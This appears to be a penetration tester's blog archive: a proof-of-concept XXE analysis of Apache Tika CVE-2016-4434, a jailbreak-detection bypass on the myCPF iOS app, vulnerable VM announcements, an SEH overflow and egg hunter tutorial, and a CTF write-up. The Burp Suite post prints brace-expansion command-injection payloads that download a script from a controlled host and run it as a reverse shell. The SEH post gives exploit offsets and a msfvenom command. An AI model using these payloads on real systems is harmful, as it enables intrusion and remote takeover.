Analysis of CVE-2016-4434; XML External Entity Vulnerability on Apache Tika 1.12

Standard

This blogpost will be about the analysis of CVE 2016-4434, a XML External Entity (XXE) vulnerability that was published back in 2017. (https://www.cvedetails.com/cve/CVE-2016-4434/)

Since there is no publicly known (couldn’t find any) proof of concept or exploit available, we will also pinpoint the trigger point of the XXE and provide a proof of concept exploit. Hopefully this will save someone’s time if they are ever faced with an outdated Apache Tika server.

Following through one of the reference stated, we can have a better understanding on the exact file format that can trigger the XXE, as well as the person who discovered this issue:

wp1

It seems clearer now that we have the exact file format to look into. We will focus on OOXML spreadsheet (xlsx) to try to pinpoint the said XXE.

Looking at Apache Tika (https://tika.apache.org/index.html) it seems to be a very straight-forward software. Quoting from the provided link:

The Apache Tika™ toolkit detects and extracts metadata and text from over a thousand different file types (such as PPT, XLS, and PDF). All of these file types can be parsed through a single interface, making Tika useful for search engine indexing, content analysis, translation, and much more. You can find the latest release on the download page. Please see the Getting Started page for more information on how to start using Tika.

And they ain’t joking with the “thousand different file types” . Setting up is simple, we can download the JAR file provided and execute it. It will spin up a Jetty web server so no additional configuration was required.

wp2

We can verify the Tika server is running and fetch the exact version of it with the following endpoints:

wp3

Moving on we will now look into OOXML files.

To those unaware, documents such as xlsx, docx, pptx are all OOXML files. They can be unzipped and the document’s structure, style, format, the content itself, etc. are all .xml files. The following reference explains it well: http://officeopenxml.com/anatomyofOOXML-xlsx.php

After unzipping an example .xlsx file, the directory tree of the document is shown:

wp4

The actual content of the spreadsheet lies in sharedStrings.xml. It should be the obvious spot to try the XXE vulnerability as the defined entity reference can be used and it should reflect the fetched file’s content in the spreadsheet content.

Trying that out yield no results.

The next obvious thing to do would be to trial and error all the .XML files to see which file would trigger the XXE.

And after 5 minutes…

It is found that the XML file that would trigger the XXE is in worksheets/sheet1.xml.

Awesome. A quick proof-of-concept to exfiltrate data could be build with the help of the XXE Payloads page.

The following sheet1.xml shows the malicious external entity reference:

wp5

The payload will send a request to our web server to fetch a DTD file (lol.xml) with the content of:

wp6

The DTD file shown above defines 3 parameters, data, param1 and exfil

Data should contain the content of the file that we wish to exfiltrate, in this case an example text field called flag.txt

Param1 will trigger a HTTP request (that is defined as exfil) to a web server that we control, sending the value of the data parameter.

The calling of the defined entities can be seen in the worksheet sheet1.xml. (%remote, %param1, %exfil).

The content of the file flag.txt that we wish to exfiltrate has the following value:

wp7

If all goes well, we should receive the string “proofofconceptflag” on our listening web server.

To sum it up:

First we perform reconnaissance to look for Apache Tika endpoints, and also fetch the version to check if it is vulnerable:

wp8

Next we build our malicious xlsx document with the payload shown above. We also prepare a DTD file that our target will fetch from, to perform the out of band data exfiltration.

Setting up a web server with python’s SimpleHTTPServer on port 4444:

wp9

We launch the exploit with the malicious document (exploit.xlsx) against the vulnerable Apache Tika endpoint with the following cURL command:

wp10

Checking on our python web server… Success!

wp11

Billion Laughs Attack was also attempted but Java is so smart, so no go:

wp12

To conclude, we manage to pinpoint the XXE to a specific .xml file out of a bunch of them and developed a working proof of concept for CVE 2016-4434.

Advertisements

Bypassing Jailbreak Detection on a React Native Framework iOS app

Standard

TL;DR: Bypass Jailbreak Detection on a React iOS application with a !

While looking at the myCPF (https://en.wikipedia.org/wiki/Central_Provident_Fund) iOS mobile application during the weekend, I was quite surprised (in a good way) that it has jailbreak detection implemented!

Jailbreak detection is more prominent in the financial industry such as banking and insurance applications. It is commendable that myCPF, a small application that mainly only allows for viewing of accumulated pension funds, to have jailbreak detection implemented.

jailbreak-detection

Jailbreak detection prevents the application from running on a jailbroken device; it can be for many reasons, mainly to prevent a user from performing analysis on the application, or help prevent user data in the application from being compromised, since a jailbroken device is less secure.

Jailbreak detection is also one of the most common protection mechanism for a mobile application, alongside with SSL Pinning.

The usual way of bypassing jailbreak detection is to first identify the implementation of it, usually by dumping the class and method names and searching for relevant naming conventions such as “jailbreak detection”, “isjailbroken”, etc. and attempt to modify its returned value from “true” to “false” or 1 to 0, or even simply nullifying it.

In the case of a React iOS application, the main application code is not in the main binary, therefore dumping the classes and methods from the running application is not going to work. By throwing the binary into Hopper and searching for relevant terms mentioned above, returns nothing as well.

hopper-no-jbd

The main application code in a React iOS application is located in the main.jsbundle file and by searching for relevant jailbreak detection method in it, we can quickly identify a few related terms.

First we identify myCPF application directly on our jailbroken iOS device:

dot-app-files-redacted

We then copy out the main.jsbundle application code to our main machine for easier analysis:

main-jsbundle-analysis

Beautifying the .js code, we can spot the main return value of the jailbreak detection on around line 82K. We simply add an ! to the return r.isJailBroken call. This means that if the iOS device is jailbroken, it will return that it is not jailbroken instead.

main-jsbundle-analysis2

Copy over the edited main.jsbundle file back to the myCPF application on our jailbroken iOS device; rerun the application; done.

jailbreak-detection-bypass-redacted

 

We have successfully bypassed jailbreak detection with a single !

 

Gemini Inc V2 Vulnerable Machine

Standard

I have decided to create vulnerable machines that replicate the vulnerabilities and difficulties I’ve personally encountered during my last year (2017) of penetration testing.

Some of the vulnerabilities require the “Think out of the box (fun)” mentality and some are just plain annoyance difficulties that require some form of automation to ease the testing.

GeminiInc v2 has been created that replicate a few issues that I’ve encountered which was really interesting and fun to tackle, I hope it will be fun for you guys as well.

Adding a little made-up background story to make it more interesting…

Introduction:

Gemini Inc has contacted you to perform a penetration testing on one of their internal system. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.

A complete intended solution will be provided some time after this has been published to vulnhub. Stay tune:
https://scriptkidd1e.wordpress.com/geminiinc-v2-vm-walkthrough/

The VM has been tested on the following platform and is working:

  1. Mac OSX VMWare Fusion
  2. Windows 10 VMWare Player
  3. Windows 10 VMWare Workstation

It should work with any virtual machine player as well. It will be able to obtain an I.P Address with DHCP so no additional configuration is required. Simply import the downloaded VM and you are good to go.

Gemini-Pentest-v1.zip
(SHA 1):

GeminiInc-Pentest-disk1.vmdk
(SHA 1):

Download:
https://drive.google.com/open?id=19nIzviapxcN7CEsciXeoPfMqEXSKzB8w

Tweet me your writeup @ https://twitter.com/sec_9emin1

 

Reliance on Burp’s Active Scanning(?)

Standard

If you are using the paid version of Burp Suite, you will probaby be aware of the Active Scan module that it provides. It is an extremely handly module that is able to quickly (hopefully) identify possible vulnerabilities in defined parameters set by the user.

Quoting from from the official page itself PortSwigger:

There are various well-known limitations on the types of vulnerabilities within web applications whose detection can be reliably automated. Burp’s active scanning capabilities are designed to focus on the kind of input-based bugs that scanners can reliably look for. By avoiding the false positives that arise in other areas, Burp gives you confidence in its output, leaving you to focus on the aspects of the job that require human experience and intelligence to deliver.

The issues that Burp’s active scanning is able to identify mostly fall into two categories:
1. Input-based vulnerabilities targeting the client side, such as cross-site scripting, HTTP header injection, and open redirection.
2. Input-based vulnerabilities targeting the server side, such as SQL injection, OS command injection, and file path traversal.

Now, depending on the attitude and the quality of the tester, the tester might quickly run through the web application functionalities with Active Scan to identify all the vulnerabilities. After reading about the Bash Brace Expansion and in particular, this acticle, I have decided to try Active Scan on a RCE-vulnerable function with an input filtering of the space character.

First try with Active Scan yield the following results:

active-scan-result1active-scan-result2

It can be seen that Active Scan will pick up the OS Command Injection vulnerability without fail, using nslookup as the payload and checking the request from the collaborator.

Now we will implement input filtering to invalidate payload submitted that contains space.

add-space-filtering

Second try with Active Scan…

active-scan-result3

As expected, Active Scan completely misses the OS Command Injection vulnerability now. A high risk high impact finding was let go like this. This is what happens when the tester solely relies on Active Scan to quickly finish off the job.

From the code, we know that it is definitely vulnerable to command injection since it is only filtering whitespace. However, this is a blind command injection as no useful response will be returned upon a successful command injection exploit. We can still verify the existence of this vulnerability nevertheless.

First we can see that this is indeed a blind injection. Executing ‘ifconfig’ yields no response of any results matching the keyword ‘inet’

blind-injection

However, with the help of the Bash Expansion using curly braces and substituting spaces with commas, we can execute commands such as ‘curl’ without spaces, which we will be able to justify the vulnerability by looking at incoming requests to a web server we control.

blind-injection2

We can even compromise the server completely launching a reverse shell with Bash Expansion. Our payload will contain no spaces:

  1. curl a reverse shell and output it to the /tmp directory of our target
  2. modify the permission to executable
  3. execute the reverse shell

Payload executed:

  1. %26{curl,http://192.168.0.101:8000/rshell.sh,–output,/private/tmp/lol1.sh}
  2. a%26{chmod,%2bx,/private/tmp/lol1.sh}
  3. a%26{bash,/private/tmp/lol1.sh}

1st Payload [verifying it on the filesystem]:

blind-injection3

2nd Payload [changing the permission to executable]:

blind-injection4

Finale [launching the reverse shell]:

blind-injection5

Active Scan can be handy and convenient, but it is always better to manually test and go through the more interesting functionalities when performing a security assessment of an application.

Brains > Tools

Gemini Inc v1 Vulnerable Machine

Standard

I have decided to create vulnerable machines that replicate the vulnerabilities and difficulties I’ve personally encountered during my last year (2017) of penetration testing.

Some of the vulnerabilities require the “Think out of the box (fun)” mentality and some are just plain annoyance difficulties that require some form of automation to ease the testing.

GeminiInc v1 has been created that replicate an issue that I’ve encountered which was really interesting and fun to tackle, I hope it will be fun for you guys as well.

Adding a little made-up background story to make it more interesting…

Introduction:

Gemini Inc has contacted you to perform a penetration testing on one of their internal system. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.

A complete intended solution will be provided some time after this has been published to vulnhub. Stay tune:
https://scriptkidd1e.wordpress.com/geminiinc-v1-vm-walkthrough/

The VM has been tested on the following platform and is working:

  1. Mac OSX VMWare Fusion
  2. Windows 10 VMWare Player
  3. Windows 10 VMWare Workstation

It should work with any virtual machine player as well. It will be able to obtain an I.P Address with DHCP so no additional configuration is required. Simply import the downloaded VM and you are good to go.

Gemini-Pentest-v1.zip
(SHA 1): 47ca8fb27b9a4b59aa6c85b8b1fe4df564c19a1e

GeminiInc-Pentest-disk1.vmdk
(SHA 1): 617ec99a957ce501a328d03d968fea771bcfa561

Download:
https://drive.google.com/open?id=1J7Rlheer0snv8pB7VRxxotd3yHmdbEMV

Tweet me your writeup @ https://twitter.com/sec_9emin1

 

SEH Overflow + Egg hunter in 1 go!

Standard

Hello pee-ple,

As the OSCP PWK course only covered basic stack-based overflow exploitation, I decided to learn about SEH overflows and the concept of egg hunters!

I will not be talking about the theory behind those 2 in this post.
Instead, I will be writing up how to exploit them.

I will re-write the existing exploit from scratch and hopefully it might be helpful to some of you haxxers out there!

Pre-requisite:
Understanding of Buffer Overflows (Simple stack based)
Configured Immunity Debugger and Mona.py
Read up on nSEH/SEH Overflow concepts
Read up on EggHunter concepts

Existing exploit available at –
https://www.exploit-db.com/exploits/40178/

Vulnerable application that we are attacking –
https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

My target VM:
Windows XP SP3

My attacking VM:
Kali Linux

Let’s begin~!

Set up with Immunity Debugger and Mona.py

setup1

The application will crash with 4500 of junk buffer.
After sending 4500 junk buffer, press Shift + F9 to pass the exception and you should see that the EIP register is overwritten by “A”s

pattern_create.rb -l 4500
pattern_offset.rb -q $overwritten_eip_value
offset = 4065

Minus 4 from the offset to overwrite it with “C” buffer instead for the SEH handler
Your exploit PoC should look something like this:

junk = “A” * 4061 + “B” * 4 + “C” * 4 + “D” * 431

“B” -> nSEH
“C” -> SEH

Launch the exploit PoC, it should trigger an access violation, continue by passing it with Shift+F9, you should notice that the EIP are overwritten with 43434343 (“C”*4)

poc1

Now we should look for the address of a POP POP RETN instruction so we can land onto our “B” * 4 (nSEH) buffer. Run “!mona seh” on the Immunity Debugger console.

!mona seh

Locate your Immunity Debugger folder (Example: C:\Program Files\Immunity Inc\Immunity Debugger)

sehppr

It will contain all the POP POP RET addresses, choose 1 that does not contain any dangerous bytes such as \x00

I decided on the address 0x1002379d

Replace the “C” * 4 with the PPR address that you have chosen

Restart your Immunity Debugger and reattach the process by pressing CTRL + F2, go to your PPR address 1002379d and set a breakpoint.

Rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 buffers after stepping over the POP POP RETN instructions.

4

Step over the POP POP RETN with F7.

5

Awesome.

Now we need to jump backward into our “A” buffers
“\xEB\xC4\x90\x90” will jump backwards 60 bytes (-60bytes on calculator)

Update your PoC exploit and replace the “B” * 4 with “\xEB\xC4\x90\x90”

Your PoC exploit should look something like this.

6

Set a breakpoint at your chosen PPR address again and rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 which is now replaced with “\xEB\xC4\x90\x90” (jump backward 60bytes) and by stepping over again, you should land in the “A” buffers.

The “\xEB\xC4\x90\x90” in Immunity Debugger.

7

Stepping over with F7 should land you into the “A” buffer.

8

Nice. You are all set to send your Egg Hunter tag, shellcode, and everything else in 1 go!

Generate your Egg Hunter tag with the following command on Immunity Debugger console.

!mona egg -t p0rn

Copy paste the generated 32 bytes hex codes into your PoC exploit.

9

Generate your shellcode with msfvenom:
msfvenom -p windows/exec cmd=calc.exe -e x86/alpa_mixed -f -c

Your final exploit PoC should look something like this:

10

All is set, embrace teh calculator!

11

Neat!

Note that there are other ways to pwn this application. Just having my own way of fun.
I have decided to exclude my full exploit code so that you can try it out yourself!

I know that SEH Overflows and Egg Hunter concept are obsolete. But…… It is always good to learn new stuff! Well at least for me.

Stay safe people!

~9emin1

MITRE STEM CTF: Cyber Challenge 2016

Standard

Hello people!

I managed to participate in my first ever Capture the Flag event. It was fun, and challenging at the same time. I took part in this with one of my buddies (KiaM). So yeah our little ‘team’ consists of just us.

Our main objective was of course, to learn and gain experience. And for sure we did 🙂

I will be doing the write up of the challenges solved by me and my friend. Cheers!

Link to said CTF –
https://ctftime.org/event/330
http://mitrecyberacademy.org/competitions/
https://scoreboard.mitrestemctf.org/

Grab Bag – 10 points
==========
Welcome! 10 points

Knowing the flag format is important! It will help you a lot with this challenge. Read the rules and come on back!
==========
This was pretty simple and straight-forward, morale boost I suppose.

1

Grab Bag – 100 points
==========
Supa Hot Fire 100 points

Your obnoxious neighbor just installed a IP enabled household heating controller. You were able to get into his home network since he still uses a WEP key. Time to get him back with a harmless prank of burning out the heating coils in his house.
==========
The interface provided.

main
So basically we have to play around the switches D0-D9 and fake overheating. The switches can be clicked to switch between HIGH/LOW.

We’ve got to find a configuration that will cause a sustained increase in temperature.
Let’s lookup CD74HC4067.

Turns out it’s an Integrated Circuit. We’ll look for the Data Sheet and find the Truth Table to see how it works.
2

For the left circuit we want channel 11 to be selected. We set D0, D1, D3 to HIGH.
For the right circuit we want channel 6 to be selected. We set D5, D6 to HIGH.
The flag is revealed at the bottom right.

3

Grab Bag – 150 points (1)
==========
Its Over 150 points

Your friend thinks he’s really good at sending hidden messages, time to prove him wrong.
==========
This was solved using an online photo editor. For this challenge the flag will actually be 7 characters instead of the usual 8. (Was told ahead on the CTF website itself)

Upload the PNG provided to http://www194.lunapic.com/editor/
1
Not so straight-forward.
Add filters, select Neon lights, and the real flag will be displayed.
2

 Grab Bag – 150 points (2)
=========
Traffic Dots 150 points

Traffic Dots are devices used in roadways around the world for detecting car presence at intersections as well as highways. They communicate with the traffic light controller over an unprotected 2.4ghz connection. They report how many cars have passed as well as if a car is present over the sensor. These are battery powered devices that are put under roads and are expected to last from 5 to 10 years on battery. The more cars that go over the sensor the faster the battery will drain. The software to configure the Traffic Dots is openly given out by the manufacturer and through some clever social engineering you managed to get access. You put the software on your laptop and got the proper radio technology to use the software. You are near an intersection where the traffic is very busy in one direction but not the other. There has to be a way to increase traffic by modifying these Traffic Dots which may result in someone running a red light due to impatience
==========
Our objective is to “result in someone running a red light due to impatience”.

The traffic dots that have the most cars run over them communicate with the traffic light controller and the controller assigns more time for traffic in that direction.

By switching making the traffic light controllers that the traffic dots report to, we can create a situation that someone might run a red light due to impatience, as they would have expected to have more time.

tis1

Freq: The connection frequency
Volt: The amount of battery remaining. The lower the voltage, the busier the road.

From the voltages, we can clearly see that traffic in the East-West directions is higher than North-South.

Let’s swap the frequencies.
tis2

We use 2.440 as an intermediate swap frequency as there is no in-built function to swap dot frequencies.

Once you have swapped:

W1 with N1, W2 with N2, E1 with S1, E2 with S2,

The flag will be revealed.

tis3

Grab Bag – 200 points
==========
Alien Contact 200 points

After many years of investing funds into the search for extraterrestrial life it has finally paid off! We have managed to capture what we believe is a broadcast from an alien radio station. Why not give it a look?
==========
This challenge was about analyzing the spectrum in a .wav audio file.

apt-get install audacity
launch audacity
open the .wav file with audacity
select “View Spectogram”

1

2

Crypto – 50 points
==========
… Not! 50 points

The key is not MCA-3CD9E73E.
==========
3CD9E73E
Converted to binary: 0011 1100 1101 1001 1110 0111 0011 1110
After performing NOT binary operation: 1100 0011 0010 0110 0001 1000 1100 0001
Conversion to hex: C32618C1

Flag = MCA-C32618C1

Incident Response – 100 points
==========
PCAP Examination 100 points

Scenario:
One morning before the daily IT team meeting, Joseph Adams inadvertently installs malware posing as a software update onto his corporate Windows VM. The malware beacons out to a Linux machine outside the corporate network and the waiting attacker uses Joe’s Windows 7 VM as a pivot point to reach the rest of the internal, corporate network.

The attacker locates a Linux-based file server and uses credentials that Joe had stored in an unencrypted plaintext file to log in to the file server.

The attacker locates a Truecrypt file on the file server, exfiltrates the file, and replaces the original file with a second file that he/she has uploaded.

When Joe returns from his morning meeting, he notices the attacker is still connected to his VM. He immediately logs in to the hypervisor, suspends the VMs, and retains the volatile memory (raw/DD) and virtual hard disk (VMDK) files from the affected machines for forensic analysis.

Later that afternoon, the attacker contacts the company’s CIO Office and offers up the original file and password for ransom.

The corporate CIO would like the internal IR Team to investigate whether the exfiltrated Truecrypt file can be recovered without having to pay the ransom.

Evidence
Archive Password: fV9kilIT29ITiGrZkvrOjZ4ENEK82O5ble4F9l5imirhDZ92COp9uPEZTCjNrAY
Prove that you have found the stolen file by providing its sha1sum
==========
Always good to get an overall view of the traffic present.
Wireshark Menu Bar > Statistics > Protocol Hierachy

tis1
We can see a significant amount of FTP Data being present.
Apply the display filter ‘ftp’ to get a closer look.

tis2

At 17994, we can see a file ‘pictures.zip’ being transferred, with filesize 4194304 bytes.
Let’s apply display filter ‘ftp-data’ to obtain the file.

tis3

On 17995, using right-click > Follow > TCP Stream , we will see the data contained within the packets that are involved with this stream.

tis4

We can see that the amount of data in the ‘Entire conversation’ is 4194 kB, which matches the file size of pictures.zip as we would expect.
Now we show the stream data as ‘RAW’, and click ‘Save as…’

tis5

The sha1sum gives us the answer. (flag)
tis6

Incident Response – 200 points
==========
Windows Volatile Memory Analysis 200 points

Show that you have discovered the attackers persistence mechanism by providing the sha1sum of the registry key used.
==========
We will make use of Volatility, a built-in forensics tool available in Kali Linux.

First step, to get a profile of the image. (Win7SP0x86)
1

Next, we can proceed on to examine the hivelist.
I chose to use the vol.py instead of the Volatility command due to some weird errors.
If you want to use vol.py, make sure that you are in the volatility folder as shown.

2

We can proceed to discover what are the registry keys used for the attacker’s persistence.
To auto run a malicious file when Windows boots up, the usual place an attacker will tamper with is the CurrentVersion\Run registry path.
We will proceed to use the function printkey -K

3

We can see that the .vbs script seems very suspicious, and the key associated is “exWaMEoIW”

The flag for this challenge:

4

Incident Response – 300
==========
Didn’t take down the question 😦
But the challenge was basically finding the password of a .db file and getting the sha1sum of it
==========
The password can be found from Incident Response – 200 by doing a lsadump.
ir300

Essentially that’s the key step. The rest is just mounting the 2 .dd images, one of which was encrypted. The screenshot contains the password to the encrypted image, and the employee database is in there.

Web – 100 points
==========
Crisscross 100 points

Our favorite Harry Potter fan site seems to be experiencing some problems, see if you can help us figure out why.
==========
The provided URL.
whatsapp-image-2016-09-18-at-00-52-49

View page source…
whatsapp-image-2016-09-18-at-00-53-22

Pretty straight forward. The flag was revealed at the
/whereISend/allYourPasswordsAndStuff
directory.

Web – 150 points
==========
Welcome Home 150 points

You just got back from a long trip and seem to have forgotten the PIN to your home security system. Guess you’ll just have to break in…
==========
URL provided.
Possible usernames: guest, JohnSmith.
whatsapp-image-2016-09-18-at-00-55-15
Another possible username? donutsAreGr8, we will just take note for now.

whatsapp-image-2016-09-18-at-00-55-51
Ok, So basically if we succeed in logging in, we will be redirected to /login/$username/$pin

whatsapp-image-2016-09-18-at-00-59-37

I went on to look at the request/response via Burp Suite proxy. I discovered that if the request was wrong, I will be presented with a 30X HTTP status code, and then redirected back to /home.
Since the PIN is only 4 digits, it was feasible to attempt brute-force.

First, make use of the tool ‘crunch’ to create a 0000-9999 word list.
I went on to launch gobuster, a brute-forcing tool.

The first user I tried on was ‘guest’, it was discovered that guest’s PIN is ‘1234’ and the status code returned was 200. The homepage of the user guest indicates that the flag is in another user’s home.

The next user I tried on was ‘JohnSmith’, after going through the entire word list, JohnSmith’s PIN was not discovered. I figured out my approach was most likely correct, since I am able to obtain guest’s PIN.

I tried the user donutsAreGr8 instead, and boom!
1

2

The user ‘JohnSmith’ was a distraction, and my approach was right 🙂

========================================================================

Ok, that’s all the challenges me and my buddy managed to solve.
We concluded at 1510 points total.
The full categories of this CTF were:
Binary
Crypto
Forensics
Grab Bag
Incident Response
Web

I was quite disappointed with myself as I did not progress well enough in the Web category. I am excited to see the full solution write up!

I definitely had fun and learned a few new stuff as well.

Cheers people~

-9emin1